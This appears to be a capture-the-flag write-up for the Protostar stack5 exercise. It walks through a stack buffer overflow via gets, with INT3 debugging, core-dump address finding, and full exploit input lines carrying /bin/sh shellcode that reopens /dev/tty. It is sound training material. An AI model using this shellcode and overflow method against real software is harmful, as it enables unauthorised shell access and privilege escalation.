This is similar to the previous exercise, however there is no winner function we might be able to call. We have to provide our own shellcode and jump to it.

I started with the solution of the previous exercise. I appended 0xcc after the address. 0xcc is INT 3. This instruction stops the application, so that we can debug it. I also updated the address to jump onto the 0xcc.

I saved the input into a file:

$ echo `python -c ‘print “\x90″*76 + “\xd0\xfc\xff\xbf” + “\xcc”‘` > /tmp/1

Then I started the gdb and run the application with forwarding the input.

(gdb) r < /tmp/1 The execution stopped as we expected. The application stopped with SIGTRAP.   Here comes the tough part. A simple shellcode did not work for me. I found the answer here: Linux/x86 – stdin re-open and /bin/sh exec Shellcode (39 bytes)

In case of a gets buffer overflow, the stdin should be closed and reopened. I used this shellcode to get a shell.

I modified the solution and placed the shellcode after the RET address. The updated solution:

$ echo `python -c ‘print “\x90″*76 + “\xd0\xfc\xff\xbf” + “\xcc” + “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80″‘` > /tmp/1

When I tried this without gdb, the exploit did not work. Definitely the address was different. The other way to figure out correct addresses without gdb is using core dump files. In order to generate core dump files, set the /proc/sys/fs/suid_dumpable to 2. This can be done only as root. Also set the core limit to unlimited.

# echo 2 > /proc/sys/fs/suid_dumpable

$ ulimit -c unlimited

The core dump file will be generated under the /tmp folder as the core_pattern suggests.

$ cat /proc/sys/kernel/core_pattern

Now let us set the address to 0x41414141 and run the program to generate core dump file.

$ echo `python -c ‘print “\x90″*76 + “\x41\x41\x41\x41” + “\x90″*32 + “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80″‘` > /tmp/1

$ cat /tmp/1 | /opt/protostar/bin/stack5
Segmentation fault (core dumped)

Let us load the core dump file into gdb. First we have to set appropriate rights.

# chmod 666 core.11.stack5.3241

$ gdb /opt/protostar/bin/stack5 –core=/tmp/core.11.stack5.3241

screen-shot-2016-11-30-at-23-08-55

Now we can update the address with a correct value.

$ echo `python -c ‘print “\x90″*76 + “\xf0\xfc\xff\xbf” + “\x90″*32 + “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80″‘` > /tmp/1

screen-shot-2016-11-30-at-23-10-58